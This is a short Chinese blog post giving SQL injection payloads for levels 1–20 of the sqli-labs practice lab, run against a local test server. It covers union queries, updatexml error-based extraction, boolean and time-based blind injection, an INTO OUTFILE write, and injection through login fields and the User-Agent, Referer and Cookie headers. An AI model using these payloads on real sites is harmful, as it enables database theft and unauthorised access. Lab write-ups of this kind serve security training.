sqlilabs 1-20关 payload

1、
联合查询注入:
爆库名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),3 --+
爆表名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+
爆列名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),3 --+
爆数据:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select email_id from security.emails limit 1,1),3 --+

2、
同1
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,user(),3

3、
同1
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,user(),3 --+

4、
同1
http://127.0.0.1/sqli/Less-3/?id=-1") union select 1,user(),3 --+

5、
报错注入:
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select id from security.emails limit 0,1),0x7e),1) --+

布尔盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and left(database(),1)='s' --+ or http://127.0.0.1/sqli/Less-5/?id=1' and substr(database(),1,1)='s' --+ subsur从第一个字符开始每次只返回一个
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select id from security.emails limit 0,1),1,1)='1' --+

时间盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and if(length(database())>1,sleep(5),1) --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+
爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select id from security.emails limit 0,1),1,1)=1,sleep(5),1) --+


6、
同5
http://127.0.0.1/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+

7、
http://192.168.43.83/sqli/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\1.txt"#

8、
同5 布尔或时间盲注(无错误回显,所以无法报错注入)
http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>5 --+

9、
同5 时间盲注

10、
同5 双引号闭合 时间盲注
http://127.0.0.1/sqli/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1) --+

11、
POST注入 (万能密码)
联合查询注入/报错注入/盲注??
admin' order by 3 #
1' union select user(),database() #


12、
1") union select user(),database() #

13、
报错注入
1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

14、
双引号闭合
1" and updatexml(1,concat(0x7e,database(),0x7e),1) #

15、
布尔盲注
admin' and length(database())>1 #


16、
时间盲注
admin") and if(ascii(substr(database(),1,1))>1,sleep(5),1) #

17、
报错注入
username:admin
password:1' and updatexml(1,concat(0x7e,database(),0x7e),1) #

18、
User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

19、
Referer: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1


20、
Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #

posted @ 2020-07-09 11:51  vvan9  阅读(414)  评论(0编辑  收藏  举报